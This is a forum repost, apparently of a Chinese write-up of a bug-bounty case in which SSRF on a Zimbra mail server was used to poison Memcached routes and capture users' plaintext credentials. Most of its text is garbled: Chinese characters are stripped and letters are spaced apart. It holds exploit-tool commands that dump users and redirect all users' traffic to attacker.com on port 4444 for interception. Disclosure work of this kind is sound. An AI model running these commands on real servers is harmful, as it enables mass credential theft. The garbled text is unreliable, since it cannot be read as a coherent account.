搜索

[15769] 2020-08-24_挖洞经验以SSRF获取Zimbra邮件服务的用户明文凭据

文档创建者:s7ckTeam
浏览次数:34
最后更新:2025-01-18
2020-08-24_挖洞经验以SSRF获取Zimbra邮件服务的用户明文凭据   |   S S R F Z i m b r a   c l o u d s   F r e e B u f   2 0 2 0 - 0 8 - 2 4 Z i m b r a b u g S S R F C a f e b a z a a r 2 0 1 1 4 A P P A P P 1 6 4 0 0 0 2 0 1 9 4 4 0 0 0 Z i m b r a Z i m b r a   Z i m b r a D e s k t o p W e b M a i l W e b Z i m b r a Z i m b r a Z i m b r a   C o l l a b o r a t i o n S u i t e Z C S 线 线 C a f e b a z a a r W e b m a i l - m a i l x . h e z a r d a s t a n . n e t
1 1 2 1 1 M e m c a c h e d 1 M e m c a c h e d 1 1 2 1 1 2 Z i m b r a 3 4 D D O S Z i m b r a Z i m b r a M e m c a c h e d I P M e t a s p l o i t m e m c a c h e d _ e x t r a c t o r
Z i m b r a 1 2 m a i l x . h e z a r d a s t a n . n e t U R L 3 Z i m b r a 4 5 U R L Z i m b r a r o u t e : p r o t o = i m a p s s l ; u s e r = [ R E D U C T E D ] @ c a f e b a z a a r . i r   1 2 7 . 0 . 0 . 1 : 7 9 9 3 r o u t e : p r o t o = p o p 3 s s l ; u s e r = [ R E D U C T E D ] @ c a f e b a z a a r . c l o u d   1 2 7 . 0 . 0 . 1 : 7 9 9 5 r o u t e : p r o t o = h t t p s s l ; u s e r = [ R E D U C T E D ] @ c a f e b a z a a r . i r   1 2 7 . 0 . 0 . 1 : 8 4 4 3 r o u t e : p r o t o = [ U s e r P r o t o c o l ] ; u s e r = E m a i l A d d r e s s O r I D
Z i m b r a I M A P S S L   1 2 7 . 0 . 0 . 1 : 7 9 9 3 P O P 3 S S L   1 2 7 . 0 . 0 . 1 : 7 9 9 5 H T T P S S L ( H T T P S )   1 2 7 . 0 . 0 . 1 : 8 4 4 3 m a i l x . h e z a r d a s t a n . n e t 访 I M A P S S L   m a i l x . h e z a r d a s t a n . n e t : 7 9 9 3 P O P 3 S S L   m a i l x . h e z a r d a s t a n . n e t : 7 9 9 5 H T T P S S L ( H T T P S )   m a i l x . h e z a r d a s t a n . n e t : 8 4 4 3 S S R F S S R F 1 I P I P 2 S S L I P S S L 3 I P I P m a i x . h e z a r d a s t a n . n e t S S R F 访
1 I P 2 I P I P 3 m a i x . h e z a r d a s t a n . n e t Z i m b r a I P 4 S S L 5 S S L 6 - H e z a r S p l o i t . p y 1 m a i x . h e z a r d a s t a n . n e t p y t h o n   H e z a r S p l o i t . p y   - m   d u m p u s e r s
2 I M A P S S L 3 4 p y t h o n   H e z a r S p l o i t . p y   - m   m i t m   p o r t   4 4 4 4 p y t h o n   H e z a r S p l o i t . p y   - m   p o i s o n i n g   u s e r   a l l   i p   a t t a c k e r . c o m   p o r t   4 4 4 4 p y t h o n   H e z a r S p l o i t . p y   - m   r e s e t p y t h o n   H e z a r S p l o i t . p y   - m   m i t m   p o r t   4 4 4 4
m a i x . h e z a r d a s t a n . n e t p y t h o n   H e z a r S p l o i t . p y   - m   p o i s o n i n g   u s e r   a l l   i p   a t t a c k e r . c o m   p o r t   4 4 4 4
m a i x . h e z a r d a s t a n . n e t C a f e b a z a a r $ 2 5 0 0
h t t p s : / / m e d i u m . c o m / b u g b o u n t y w r i t e u p / s t o r y - o f - a - 2 - 5 k - b o u n t y - s s r f - o n - z i m b r a - l e d - t o - d u m p - a l l - c r e d e n t i a l s - i n - c l e a r - t e x t - 6 f e 8 2 6 0 0 5 c c c
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理